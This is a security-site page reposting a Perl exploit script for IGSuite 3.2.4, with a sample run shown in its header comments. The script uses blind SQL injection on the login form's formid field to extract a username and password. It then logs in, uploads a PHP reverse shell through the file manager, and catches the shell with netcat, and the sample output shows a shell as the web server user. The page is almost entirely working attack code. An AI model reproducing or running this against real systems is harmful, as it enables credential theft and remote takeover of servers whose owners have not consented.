首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IGSuite 3.2.4 (reverse shell) Blind SQL Injection Exploit
来源:www.vfcocus.net 作者:k`sOSe 发布时间:2008-06-23  
#!/usr/bin/perl
#
# 05/18/2008 - IGSuite 3.2.4 Blind SQL Injection - k`sOSe
#
# 05/21/2008 -  Vendor notified
# 05/23/2008 -  A patch was pushed via the igsuited daemon(not enabled by default)
# Fix: run igsuited --update-igsuite or upgrade to 3.2.5-beta.
#
# Tested on IGSuite 3.2.4 on linux with MySQL, needs nc(in path).
# Drops a reverse shell, use http://pentestmonkey.net/tools/php-reverse-shell/
#
#
# cohelet ~ # ./igsploit.pl localhost /cgi-bin / ./php-reverse-shell.php 1234
# IGSploit 0.1 - k`sOSe
#
# [*] Abusing blind SQL injection: ksose=qwerty
# [*] Logging in with username `ksose', password `qwerty'...
# [I] Found `formid' -> 12141384631aX7I
# [I] Logged in!
# [*] Uploading shell..
# [I] Found `formid' -> 1214138463vOl5x
# [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here...
# listening on [any] 1234 ...
# connect to [127.0.0.1] from localhost [127.0.0.1] 44758
# Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux
#  14:41:05 up 1 day,  2:52,  1 user,  load average: 0.51, 0.34, 0.52
#  USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
#  root     tty1      Sat11   21:33m  0.84s  0.02s /bin/login --
#  uid=81(apache) gid=81(apache) groups=81(apache)
#  sh: no job control in this shell
#  sh-3.2$

use warnings;
use strict;

print "IGSploit 0.1 - k`sOSe\n\n";
usage() unless(@ARGV>2);


use POSIX;
use LWP::UserAgent;
use HTTP::Cookies;

my $ighost = $ARGV[0];
my $igcgi = $ARGV[1];
my $igpath = $ARGV[2];
my $evilfile = $ARGV[3];
my $rport = $ARGV[4];
my $igurl = 'http://' . $ighost . $igcgi;
my @chars = ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' );

my $count = 1;
my $string = '';

my $ua = LWP::UserAgent->new;  $ua->agent( "Mozilla/5.0" );
$ua->cookie_jar( HTTP::Cookies->new( ) );
$ua->timeout(5);



print "[*] Abusing blind SQL injection:   ";
$|=1;
while(1)
{
for my $char( @chars )
{
if( defined( my $found = check_char( $count, $char ) ) )
{
if( $found eq '' )
{
upload_shell( split( '=', $string ) );
exit;
}
$string .= $found;
$count++;
last;
}
}
}

sub upload_shell
{
my ($username, $password) = @_;

print "[*] Logging in with username `$username', password `$password'...\n";
do_login( $username, $password );


print "[*] Uploading shell..\n";
my $formid = get_formid( $ua->get( "$igurl/filemanager?action=uploadfile&dir=/Home/$username&repid=&repapp=&order=nome" )->content );
my $res = $ua->post( "$igurl/filemanager",
Content_Type => 'multipart/form-data',
Content => [
formid => [undef, undef, Content => $formid],
upfile => [undef, ($evilfile =~ m/.+\/(.+)/g)[0], Content => slurp($evilfile)],
newfilename => [undef, undef, Content => $evilfile],
submit8 => [undef, undef, Content => 'Conferma'],
]
);


if(qx(which nc 2>&1) !~ /^which:/)
{
print "[*] Requesting $igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . " now, shell will spawn here...\n";

my $pid = fork();
if($pid)
{
sleep 2;
my $res = $ua->get ( "http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] );

if(!$res->is_success && $res->status_line() !~ /^500 .*timeout/)
{
print "\n[W] Unexpected status code received -> " . $res->status_line . "\n";
}

waitpid($pid, 0);
}
else
{
exec("`which nc` -v -l -p $rport");
}
}
else
{
print "[W] Can't find netcat!\n";
print "[*] File uploaded on http://$ighost$igpath/Home/$username/" . ($evilfile =~ m/.+\/(.+)/g)[0] . ", start your listener on port $rport and wget it\n";
}
}

sub do_login
{
my ($username, $password) = @_;

my $formid = get_formid($ua->get( "$igurl/igsuite" )->content);

my $res = $ua->post( "$igurl/igsuite",
{
formid => $formid,
login => $username,
pwd => $password,
submit5 => 'Accedi',
});
die( "Can't login\n" )
if( $res->content !~ /this application need a browser that support multi frame/ );

# lies
print "[I] Logged in!\n";

return $formid;
}

sub get_formid
{
my ($content) = @_;

die( "Can't find formid value\n" )
unless $content =~ /name="formid"\s+value="(.+?)"/;

print "[I] Found `formid' -> $1\n";

return $1;
}

sub slurp
{
return do {
open(my $f, "<$_[0]") or die("opening `$_[0]': $!");
local $/;
my $s=<$f>;
close $f; 
$s
};
}

sub check_char
{
my ($count, $char) = @_;

my $res = $ua->post( "$igurl/igsuite",
{
formid => "1' OR (SELECT ".
"MID(CONCAT(`login`, 0x3d, `passwd`), $count, 1) ".
"FROM `users` LIMIT 0,1) = '$char",
});
die ("Error: " . $res->status_line . "\n") unless ( $res->is_success );

if($res->content =~ /IGSuite Error/)
{
print "\b$char";
return undef;
}
elsif($res->status_line =~ /^(2\d+|3\d+)/)
{
print "\b$char  ";
print "\n" if ($char eq '');
return $char;
}
else
{
print "\n[!] " . $res->status_line . ":\n########\n\n" . $res->content . "\n########\n\n";
die("[!] Failed, check cgi/docroot path.");
}
}

sub usage
{
die <<EOM;
Usage: $0 [host] [path to cgis] [path to igsuite docroot] [reverseshell] [reverseport]

Ex: $0 localhost /cgi-bin / ./php-reverse-shell.php 1234

EOM
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·vc6.0栈溢出
·uTorrent / BitTorrent WebIU H
·CaupoShop Classic 1.3 (saArtic
·Visual Basic Enterprise Editio
·cmsWorks 2.2 RC4 (fckeditor) R
·Deterministic Network Enhancer
·Demo4 CMS 1b (fckeditor) Arbit
·P2P Foxy Out of Memory Denial
·TOKOKITA (barang.php produk_id
·FreeCMS.us 0.2 (fckeditor) Arb
·Mambo Component Articles (arti
·MyMarket 1.72 Blind SQL Inject
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved